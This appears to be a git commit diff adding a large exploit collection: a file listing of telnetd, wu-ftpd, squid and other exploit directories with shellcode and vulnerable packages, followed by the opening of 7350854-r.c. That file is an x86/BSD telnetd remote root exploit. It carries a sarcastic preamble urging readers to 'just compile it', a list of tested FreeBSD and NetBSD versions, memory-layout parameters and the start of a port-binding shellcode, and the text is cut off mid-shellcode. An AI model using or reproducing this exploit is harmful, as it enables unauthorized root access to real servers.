mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/proto.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/ptrarray.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/ring.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/ring.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/ring.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/sys_bsd.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/sys_bsd.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/telnet create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/telnet.1 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/telnet.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/telnet.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/terminal.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/terminal.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/terminal.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/tn3270.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/tn3270.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/types.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/utilities.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/utilities.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/authenc.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/defs.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/ext.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/getent.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/global.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/issue.net.5 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/login.3 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/logout.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/logwtmp.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/pathnames.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/setproctitle.3 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/setproctitle.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/setproctitle.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/slc.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/state.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/sys_term.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/t.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/telnetd.8 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/telnetd.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/telnetd.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/termstat.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/utility.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/version.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/BUGS create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/ChangeLog create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/MCONFIG.in create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/MRULES create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/README create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/configure create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/changelog create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/control create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/copyright create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/dirs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/docs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/menu create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/postinst create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/prerm create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/rules create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/telnetd.dirs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/telnetd.docs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/telnetd.postinst create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/telnetd.postrm create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/telnetd.prerm create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/pty-hang.patch create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/README create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/README.old create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/TODO create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/array.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/authenc.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/commands.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/defines.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/depend.mk create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/environ.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/environ.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/externs.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/fdset.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/general.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/genget.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/genget.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/main.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/netlink.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/netlink.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/network.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/proto.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/ptrarray.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/ring.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/ring.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/sys_bsd.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/telnet.1 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/telnet.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/terminal.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/terminal.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/tn3270.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/types.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/utilities.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/authenc.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/defs.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/ext.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/getent.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/global.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/issue.net.5 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/login.3 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/logout.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/logwtmp.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/pathnames.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/setproctitle.3 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/setproctitle.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/setproctitle.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/slc.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/state.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/sys_term.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/telnetd.8 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/telnetd.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/telnetd.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/termstat.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/utility.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetlogin/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetlogin/telnetlogin.8 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetlogin/telnetlogin.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/version.h create mode 100644 exploits/7350855-netkit/netkit-telnet_0.16-4potato.1.diff.gz create mode 100644 exploits/7350855-netkit/netkit-telnet_0.16-4potato.1.dsc create mode 100644 exploits/7350855-netkit/netkit-telnet_0.16.orig.tar.gz create mode 100644 exploits/7350855-netkit/netkit-telnet_0.17-14.diff.gz create mode 100644 exploits/7350855-netkit/netkit-telnet_0.17-14.dsc create mode 100644 exploits/7350855-netkit/netkit-telnet_0.17.orig.tar.gz create mode 100644 exploits/7350855-netkit/telnetd-0.16.tgz create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/lib/telnetd/login create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/doc/telnetd/changelog.Debian.gz create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/doc/telnetd/changelog.gz create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/doc/telnetd/copyright create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/man/man5/issue.net.5.gz create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/man/man8/in.telnetd.8.gz create mode 120000 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/man/man8/telnetd.8.gz create mode 100644 exploits/7350855-netkit/telnetd_0.16-4potato.1.deb create mode 100644 exploits/7350855-netkit/telnetd_0.17-13_i386.deb create mode 100644 exploits/7350855/0/7350somefoo.c create mode 100644 exploits/7350855/0/Makefile create mode 100644 exploits/7350855/0/README create mode 100644 exploits/7350855/0/common.c create mode 100644 exploits/7350855/0/common.h create mode 100644 exploits/7350855/0/network.c create mode 100644 exploits/7350855/0/network.h create mode 100644 exploits/7350855/0/packet.c create mode 100644 exploits/7350855/0/packet.h create mode 100644 exploits/7350855/0/readtest.c create mode 100644 exploits/7350855/0/sniff.c create mode 100644 exploits/7350855/0/sniff.h create mode 100644 exploits/7350855/7350855 create mode 100644 exploits/7350855/7350855-bumped.tar.gz create mode 100644 exploits/7350855/7350855.c create mode 100644 exploits/7350855/7350855_exploit.c create mode 100644 exploits/7350855/Makefile create mode 100644 exploits/7350855/common.c create mode 100644 exploits/7350855/common.h create mode 100644 exploits/7350855/common.o create mode 100644 exploits/7350855/network.c create mode 100644 exploits/7350855/network.h create mode 100644 exploits/7350855/network.o create mode 100644 exploits/7350855/none.tgz create mode 100644 exploits/7350855/packet.c create mode 100644 exploits/7350855/packet.h create mode 100644 exploits/7350855/packet.o create mode 100644 exploits/7350855/readtest create mode 100644 exploits/7350855/readtest.c create mode 100644 exploits/7350855/sniff.c create mode 100644 exploits/7350855/sniff.h create mode 100644 exploits/7350855/sniff.o create mode 100644 exploits/7350aio/7350aio.c create mode 100644 exploits/7350bdf/7350bdf.c create mode 100644 exploits/7350hprlpd/7350hprlpd create mode 100644 exploits/7350hprlpd/7350hprlpd.c create mode 100755 exploits/7350hpuke/7350hpuke create mode 100644 exploits/7350hpuke/7350hpuke.c create mode 100644 exploits/7350hpuke/backup/7350hpuke-0.2.0.c create mode 100644 exploits/7350hpuke/backup/7350hpuke-0.2.1.c create mode 100644 exploits/7350hpuke/backup/7350hpuke-0.4.0.c create mode 100644 exploits/7350hpuke/proof/proof.txt create mode 100644 exploits/7350hpuke/proof/proof_hpux_ftpd.txt create mode 100644 exploits/7350logout/7350logout create mode 100644 exploits/7350logout/7350logout-0.2.1.c create mode 100644 exploits/7350logout/7350logout.c create mode 100644 exploits/7350logout/irix-6.5-login.c create mode 100644 exploits/7350logout/login-27-x86 create mode 100644 exploits/7350logout/login-ex.c-20020318-morgan create mode 100644 exploits/7350logout/loginex.c create mode 100644 exploits/7350logout/pam.txt create mode 100644 exploits/7350logout/solaris-2.4-sparc-login create mode 100644 exploits/7350logout/solaris-2.6-sparc-login create mode 100644 exploits/7350logout/solaris-2.6-sparc-login2 create mode 100644 exploits/7350logout/solaris-2.7-login.c create mode 100644 exploits/7350logout/solaris-2.8-sparc-login create mode 100644 exploits/7350logout/solaris-2.8-sparc-login-patched create mode 100644 exploits/7350logout/solaris-2.8-sparc-login.o create mode 100644 exploits/7350php/7350php create mode 100644 exploits/7350php/7350php.c create mode 100644 exploits/7350php/Makefile create mode 100644 exploits/7350php/common.c create mode 100644 exploits/7350php/common.h create mode 100644 exploits/7350php/common.o create mode 100644 exploits/7350php/network.c create mode 100644 exploits/7350php/network.h create mode 100644 exploits/7350php/network.o create mode 100644 exploits/7350rsync/7350rsync.c create mode 100644 exploits/7350squish/7350squish create mode 100644 exploits/7350squish/7350squish-0.1.tar.gz create mode 100644 exploits/7350squish/7350squish.c create mode 100644 exploits/7350squish/7350squish.txt create mode 100644 exploits/7350squish/deb/squid_2.3.4-2_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.1-1_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.1-2_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.1-3_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.1-4_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.1-5_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.2-1_i386.deb create mode 100644 exploits/7350squish/offset-find.sh create mode 100644 exploits/7350squish/tagspace.c create mode 100644 exploits/7350squish/udp.c create mode 100755 exploits/7350wurm/7350wurm create mode 100644 exploits/7350wurm/7350wurm-backup2.c create mode 100644 exploits/7350wurm/7350wurm-backup3.c create mode 100644 exploits/7350wurm/7350wurm-backup4.c create mode 100644 exploits/7350wurm/7350wurm.c create mode 100644 exploits/7350wurm/backup/7350wurm-backup2.c create mode 100644 exploits/7350wurm/backup/7350wurm-old.c create mode 100644 exploits/7350wurm/doc/for-scut.txt create mode 100644 exploits/7350wurm/doc/free.txt create mode 100644 exploits/7350wurm/doc/syn.txt create mode 100644 exploits/7350wurm/doc/synnergy-method.txt create mode 100644 exploits/7350wurm/offset-find.sh create mode 100644 exploits/7350wurm/openbsd-ftpd-linux.txt create mode 100644 exploits/7350wurm/rpm/done/redhat50update_wu-ftpd-2.4.2b18-2.1.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat51update_wu-ftpd-2.4.2b18-2.1.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat52_wu-ftpd-2.4.2b18-2.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat52update_wu-ftpd-2.6.0-2.5.x.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat60update_wu-ftpd-2.6.0-14.6x.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat61update_wu-ftpd-2.6.0-14.6x.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat62_wu-ftpd-2.6.0-3.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat62update_wu-ftpd-2.6.0-14.6x.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat70_wu-ftpd-2.6.1-6.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat71_wu-ftpd-2.6.1-16.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat72_wu-ftpd-2.6.1-18.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/suse6061update_wuftpd-2.6.0-151.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/suse62update_wuftpd-2.6.0-121.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/suse70default_wuftpd.rpm create mode 100644 exploits/7350wurm/rpm/done/suse71default_wuftpd.rpm create mode 100644 exploits/7350wurm/rpm/done/suse72default_wuftpd.rpm create mode 100644 exploits/7350wurm/rpm/done/suse73default_wuftpd.rpm create mode 100644 exploits/7350wurm/rpm/failed/suse-53.de-wuftpd.rpm create mode 100644 exploits/7350wurm/rpm/immunix62_wu-ftpd-2.6.0-3_StackGuard.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/redhat62update_wu-ftpd-2.6.1-0.6x.21.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/redhat70update_wu-ftpd-2.6.1-16.7x.1.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/redhat71update_wu-ftpd-2.6.1-16.7x.1.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/redhat72update_wu-ftpd-2.6.1-20.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse63update_wuftpd-2.6.0-347.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse64update_wuftpd-2.6.0-344.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse70update_wuftpd-2.6.0-344.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse71update_wuftpd-2.6.0-346.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse72update_wuftpd-2.6.0-344.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse73update_wuftpd-2.6.0-344.i386.rpm create mode 100644 exploits/7350wurm/rpm/redhat60_wu-ftpd-2.4.2vr17-3.i386.rpm create mode 100644 exploits/7350wurm/rpm/redhat61_wu-ftpd-2.5.0-9.i386.rpm create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0.tgz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpaccess create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpconversions create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpgroups create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftphosts create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpusers create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/logrotate.d/ftpd create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/pam.d/ftp create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpcount create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpwho create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CHANGES create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CONTRIBUTORS create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/ERRATA create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/HOWTO/VIRTUAL.FTP.SUPPORT create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/HOWTO/upload.configuration.HOWTO create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/README create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/TODO create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess.heavy create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpconversions create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpconversions.solaris create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpgroups create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftphosts create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpservers create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpusers create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man1/ftpcount.1.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man1/ftpwho.1.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpaccess.5.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpconversions.5.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftphosts.5.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpservers.5.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/xferlog.5.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftpd.8.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftprestart.8.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftpshut.8.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/privatepw.8.gz create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ckconfig create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftprestart create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftpshut create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.ftpd create mode 120000 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.wuftpd create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/privatepw create mode 120000 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/wu.ftpd create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/xferstats create mode 100644 exploits/7350wurm/shellcode/bambam.s create mode 100644 exploits/7350wurm/shellcode/codedump create mode 100644 exploits/7350wurm/shellcode/codedump.c create mode 100644 exploits/7350wurm/shellcode/pt/Makefile create mode 100644 exploits/7350wurm/shellcode/pt/README create mode 100644 exploits/7350wurm/shellcode/pt/rptrace.c create mode 100644 exploits/7350wurm/shellcode/pt/rptrace.o create mode 100644 exploits/7350wurm/shellcode/pt/x.tar.gz create mode 100644 exploits/7350wurm/shellcode/ptrace/ptrace-legit create mode 100644 exploits/7350wurm/shellcode/ptrace/ptrace-legit.c create mode 100644 exploits/7350wurm/shellcode/t create mode 100644 exploits/7350wurm/shellcode/t.c create mode 100644 exploits/7350wurm/shellcode/write-read-exec.s create mode 100644 exploits/7350wurm/timoglaser.txt create mode 100644 exploits/ftpd_exp/README create mode 100644 exploits/ftpd_exp/exp.c create mode 100644 exploits/ftpd_exp/exp.py create mode 100755 exploits/ifafoffuffoffaf.c (limited to 'exploits') diff --git a/exploits/7350854/7350854 b/exploits/7350854/7350854 new file mode 100644 index 0000000..7647d66 Binary files /dev/null and b/exploits/7350854/7350854 differ diff --git a/exploits/7350854/7350854-r b/exploits/7350854/7350854-r new file mode 100644 index 0000000..87bf289 Binary files /dev/null and b/exploits/7350854/7350854-r differ diff --git a/exploits/7350854/7350854-r.c b/exploits/7350854/7350854-r.c new file mode 100644 index 0000000..40853ea --- /dev/null +++ b/exploits/7350854/7350854-r.c @@ -0,0 +1,944 @@ + +#ifdef DESPERATION + +Yes, this is the exploit. Yes, fully legal, straight from the authors, this +time. No need to dwelve through archives or ask teenagers to hand it to you. +Just plain and simple. For free. + +No need to worry about copyrights, privacy, about risk and results of your +actions. No need to fear legal prosecution, denial of service attacks or some +bad publicity. Just clean this time. Clean enough to right stick it into the +archive. + +No need to violate something, your moral, your ethics or the rules you live +by. They all stay away from the center of the storm, safely. + +I apologize to everyone I had asked not to disclose this and everyone who was +offended by my postings. Also the ones that send me threatening emails. And +those that pointed out my non conforming behaviour to me. I apologize. + + +Yes, full disclosure works, +Yes, this exploit helps everyone, +Yes, I truly love everyone involved. + +Yes, dear pentester, take it and earn your living in the next pentest using +this code. Enjoy how easy it was, without the need to understand, the need to +know what is happening. Ah, relieving, quite fresh even. Tastes well, nearly +as well as your fresh certificates. And you did not even pay for it, so there +is more for certificates, right? Or buy your little children some new toy, for +it was a hard time the last years, and you wish you would have more time for +them, so show it to them. + +Yes, dear collector, this is an item not to miss. Be sure to get the tagged +and broken versions too, for that your archive would be incomplete without. +And who wants that, an incomplete archive. If you like archiving, you can do +it all the time. Maybe someday you will have the archiving authority then, and +can charge money for it. Or delay things for non paying customers. But be sure +to copyright it, else some unethical person might steal your archive and nice +compilation in which you have invested so many hours and investor capital. But +I am sure you will manage this and for this I like you. + +Yes, dear moderator, as you read until now, I have to congratulate you to +having improved your reading skills. Unbelieveable, I jump, enjoying your +newly aquainted capabilities and wish you good luck in the future. After all, +information wants to be free and the sooner one gets over it and apologizes, +the more time is there to drive with the new car in this sunny days. Good +work. + +Yes, dear blackhat, for that you are remaining calm and quiet. For that, I +like you. You do not flame or provocate, you apply your wisdom after all. You +do not advocate, and you have not caused me sleepless nights. That is +something I truly like you for. + +Yes, dear whitehat, your shiny hat blends by enlightning silver colours and I +truly understand what you want to give back with nobel goals. Your bright +shining hat overtones all the unnecessary details and really points to the +important things. This brightens the goal while it shades the rough way. + +Yes, dear script kiddie, I am sorry I caused so much trouble. Just compile it +and start the fun, for that is what exploits are meant to be. And fun, it is +not important to understand things there, its important to enjoy it, right? + +Yes, dear webmaster, we all like your sites and the content. Add this file to +your content and do the humankind good. You have full legal permission to do +so, no need to worry this time. No need to argue, ask or acknowledge. + +Yes, dear author of source code, you have my true respect. You truly made the +internet what it is and I respect your true art of code. + +Yes, dear law, for that most of us respect you. You provide the framework for +social life, for the basic forms of respect in todays commercial minded +livings. Sometimes we hate you and sometimes we rely on you. Since you remain +there everytime, it must be our fault. You cannot explain it, but I think I +understand what you mean. + + +Yes, now enjoy the exploit. +No strings attached. + +#endif + +/* 7350854 - x86/bsd telnetd remote root exploit + * + * bug found by scut 2001/06/09 + * further research by smiler, zip, lorian and me. + * thanks to zip's cool friend for giving me a testbed to play on + * + * tested against: BSDI BSD/OS 4.1 + * NetBSD 1.5 + * FreeBSD 3.1 + * FreeBSD 4.0-REL + * FreeBSD 4.2-REL + * FreeBSD 4.3-BETA + * FreeBSD 4.3-STABLE + * FreeBSD 4.3-RELEASE + * + */ + +#define VERSION "0.0.7" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +/* global variables, uhhohh! + */ +int mode = 16; +int num = 245; +int pop = 31500; /* puts code at 0x08fdff0a */ +int bs = 1; /* buffer start */ + +int num34 = 244; +int pop34 = 71833; /* puts code at 0x0a0d08fe */ +int bs34 = 0; + +int walk; /* populator walker */ +int force = 0; /* force exploitation */ +int checkonly = 0; /* check telnetd only */ + + +void usage (char *progname); +int xp_check (int fd); +void xp_pop (int fd); +void xp_shrinkwin (int fd); +void xp_setenv (int fd, unsigned char *var, unsigned char *val); +void xp (int fd); +void shell (int sock); +void hexdump (char *desc, unsigned char *data, unsigned int amount); + +/* imported from shellkit */ +unsigned long int random_get (unsigned long int low, unsigned long int high); +void random_init (void); +int bad (unsigned char u); +int badstr (unsigned char *code, int code_len, unsigned char *bad, + int bad_len); +unsigned long int x86_nop_rwreg (void); +unsigned long int x86_nop_xfer (char *xferstr); +unsigned int x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len); + +#define BSET(dest, len, val, bw) { \ + dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \ + dest |= val << (8 - bw - len); /* set value bits */ \ + bw += len; \ +} + +/* imported from network.c */ +#define NET_CONNTIMEOUT 60 +int net_conntimeout = NET_CONNTIMEOUT; + +unsigned long int net_resolve (char *host); +int net_connect (struct sockaddr_in *cs, char *server, + unsigned short int port, int sec); + + +/* x86/bsd PIC portshell shellcode + * by lorian/teso + * port 0x4444 (might want to change it here) + */ +unsigned char x86_bsd_portshell[] = + "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53" + 